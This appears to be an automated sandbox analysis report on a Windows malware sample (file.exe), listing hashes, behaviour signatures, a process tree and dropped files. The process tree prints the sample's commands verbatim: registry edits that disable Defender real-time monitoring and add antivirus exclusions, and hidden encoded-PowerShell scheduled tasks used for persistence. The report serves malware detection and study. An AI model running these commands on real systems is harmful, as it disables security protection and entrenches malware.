Analysis
-
max time kernel
148s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
28-10-2022 21:54
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
2b45411ed9ea8e68c029cc0438d58d58
-
SHA1
9a296a005849ea8619ddb1478ad597a3fcdc348f
-
SHA256
cf8b5aa132d63783d62e93b9152ae9001f830034acddfc5ef905e5584cdcc2c9
-
SHA512
22fb58a80014173194bf235ca518095fc6919343bc67afd81fb62867fa776d8ab248e135ba75756831449a5fe4c666ebbce23d45f2087ef7782e368a02db0f95
-
SSDEEP
196608:91OmV9gYAf7ATQA8Jm+uN6lRZJM6+y8gYTwJkI3YWiyg:3OiBi7AM9JmEWy8gNGI3Yh
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Executes dropped EXE 3 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 8 IoCs
-
Drops file in System32 directory 8 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 9 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS5B3B.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS6385.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gISVmHpHS" /SC once /ST 17:13:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gISVmHpHS"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gISVmHpHS"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bhLXEjHxBtkbbNqWSu" /SC once /ST 23:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi\nJmfrpIUXxqiPDe\EqsGlVt.exe\" Ez /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {BE0EB9F8-7BD4-4BAC-89BC-306FB758D763} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {D54B5831-B289-4D57-B4D6-929B7939DA24} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi\nJmfrpIUXxqiPDe\EqsGlVt.exeC:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi\nJmfrpIUXxqiPDe\EqsGlVt.exe Ez /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtvusEjKW" /SC once /ST 11:24:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtvusEjKW"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gtvusEjKW"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMfzDPcjo" /SC once /ST 07:40:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gMfzDPcjo"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gMfzDPcjo"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\itLWlUfoycYRNPTF\GsCGDojV\wjiISBJpCCMtkhvN.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\itLWlUfoycYRNPTF\GsCGDojV\wjiISBJpCCMtkhvN.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtCSCKapluTyC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtCSCKapluTyC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eTQrVVcbPeUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eTQrVVcbPeUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZLmQfqCTfSU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZLmQfqCTfSU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ptIyuvGcU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ptIyuvGcU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HlgLlrmAHxInKQVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HlgLlrmAHxInKQVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtCSCKapluTyC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtCSCKapluTyC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eTQrVVcbPeUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eTQrVVcbPeUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZLmQfqCTfSU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZLmQfqCTfSU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ptIyuvGcU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ptIyuvGcU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HlgLlrmAHxInKQVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HlgLlrmAHxInKQVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPXsOdHWc" /SC once /ST 14:42:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPXsOdHWc"3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1640499733476454311-1524391518825170555528321483-1533537374140944355162057090"1⤵
- Windows security bypass
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD56ca257217ce35a8c709b081c490f0d6d
SHA1678567826335e34a5a656144fa119221ab75772e
SHA256d9874b4c2c84a61353e38435537fd3c3eca0c1b1ed78f3ad288c0ac9a2ad62d3
SHA512461e6ff523ffd14e72de7d48d2ae5d4cc9663dba1feb22fa62de092a9db53b157bb763c1ddf5ba572b34b6feeaf9661272146b6bba2df1eb0e8d75c5a2887eae
-
Filesize
6.3MB
MD56ca257217ce35a8c709b081c490f0d6d
SHA1678567826335e34a5a656144fa119221ab75772e
SHA256d9874b4c2c84a61353e38435537fd3c3eca0c1b1ed78f3ad288c0ac9a2ad62d3
SHA512461e6ff523ffd14e72de7d48d2ae5d4cc9663dba1feb22fa62de092a9db53b157bb763c1ddf5ba572b34b6feeaf9661272146b6bba2df1eb0e8d75c5a2887eae
-
Filesize
6.9MB
MD5e8e5c52d8aef74655e62c49813b5abd7
SHA111e9475aa55ec6f05fb7af75511ac79b99aafc05
SHA256996248b95eca4f67bc519d5087426f047f7d5d96bbf0dd2f511ea7a12affaed6
SHA5123ba666b24cdaf3cb9a2eb9b341517ef6e9d8220155e554fcac11d8227a6d8236efbd47688d4785caa78f24b2d23c74d36bc01e52cc4b7358279c71c68b49b5e7
-
Filesize
6.9MB
MD5e8e5c52d8aef74655e62c49813b5abd7
SHA111e9475aa55ec6f05fb7af75511ac79b99aafc05
SHA256996248b95eca4f67bc519d5087426f047f7d5d96bbf0dd2f511ea7a12affaed6
SHA5123ba666b24cdaf3cb9a2eb9b341517ef6e9d8220155e554fcac11d8227a6d8236efbd47688d4785caa78f24b2d23c74d36bc01e52cc4b7358279c71c68b49b5e7
-
Filesize
6.9MB
MD5e8e5c52d8aef74655e62c49813b5abd7
SHA111e9475aa55ec6f05fb7af75511ac79b99aafc05
SHA256996248b95eca4f67bc519d5087426f047f7d5d96bbf0dd2f511ea7a12affaed6
SHA5123ba666b24cdaf3cb9a2eb9b341517ef6e9d8220155e554fcac11d8227a6d8236efbd47688d4785caa78f24b2d23c74d36bc01e52cc4b7358279c71c68b49b5e7
-
Filesize
6.9MB
MD5e8e5c52d8aef74655e62c49813b5abd7
SHA111e9475aa55ec6f05fb7af75511ac79b99aafc05
SHA256996248b95eca4f67bc519d5087426f047f7d5d96bbf0dd2f511ea7a12affaed6
SHA5123ba666b24cdaf3cb9a2eb9b341517ef6e9d8220155e554fcac11d8227a6d8236efbd47688d4785caa78f24b2d23c74d36bc01e52cc4b7358279c71c68b49b5e7
-
Filesize
7KB
MD56aa43ea769f37413c7142ed138af1154
SHA116d2e257f5866943555838195ed615cc5066b205
SHA256dd1e73bd7d8fa6bc81f4013eecb209a976d50e6294d04d75761ad4908cddebeb
SHA512173b41538798c0a7e5ffecf4256b36f76ceb145907d3eef9b83de499e567a1fb247f4cb798e8bc7a125ed66582893150c4abf5348b85275f85009842a0d70bd2
-
Filesize
7KB
MD51f4633df88626ffda584ddbee622855b
SHA1a46a4f0ada120a4604a5cc3735bac5a4bc36c831
SHA256c1cfeba4b383257abff5b21b627989a4f2318477cdd32a53744d12ffa11c30c2
SHA512fa04c198056dbffe6cd6e0bb2c7d36bd19e9c47762bafec90c26eab238e31ead9a452d3b5f9cd701555d645ca1c94775bac83ccc64799f5fb8207847b282e35b
-
Filesize
7KB
MD5724e10f0b48c4b643a6b2c3d6d3edf20
SHA1165ea0d77108bf6bbbc42bc4de7c2fde27f4828f
SHA25634310600c397f9e651e18eeff026013c82498adb3fc706396ff5fb21603f5545
SHA5120971614626f040ad2d172c8a9018b7c7e851c70fb084430964856211dcaaff6250b2768d51c7565896880b9c81520b648002286506e4136e8fcd676c3069d0d5
-
Filesize
8KB
MD50016625ac7f2a884bb6f71d6759f2f5f
SHA19ff0909cdcd5dda7bf8197baf830c66ee5b5ee5b
SHA25607118d1552a788d8c09b7fdb7902f0afb7bac30bdef646824885a72a1c375d2d
SHA51251c9ff3164af0f45f263ad418d825501247c8d89189f9953bea52c870b5805f46364b70f4edfc6b4fd66dd02d2d980bb0e2c664051835e443151ff4fb92bd6f9
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD56ca257217ce35a8c709b081c490f0d6d
SHA1678567826335e34a5a656144fa119221ab75772e
SHA256d9874b4c2c84a61353e38435537fd3c3eca0c1b1ed78f3ad288c0ac9a2ad62d3
SHA512461e6ff523ffd14e72de7d48d2ae5d4cc9663dba1feb22fa62de092a9db53b157bb763c1ddf5ba572b34b6feeaf9661272146b6bba2df1eb0e8d75c5a2887eae
-
Filesize
6.3MB
MD56ca257217ce35a8c709b081c490f0d6d
SHA1678567826335e34a5a656144fa119221ab75772e
SHA256d9874b4c2c84a61353e38435537fd3c3eca0c1b1ed78f3ad288c0ac9a2ad62d3
SHA512461e6ff523ffd14e72de7d48d2ae5d4cc9663dba1feb22fa62de092a9db53b157bb763c1ddf5ba572b34b6feeaf9661272146b6bba2df1eb0e8d75c5a2887eae
-
Filesize
6.3MB
MD56ca257217ce35a8c709b081c490f0d6d
SHA1678567826335e34a5a656144fa119221ab75772e
SHA256d9874b4c2c84a61353e38435537fd3c3eca0c1b1ed78f3ad288c0ac9a2ad62d3
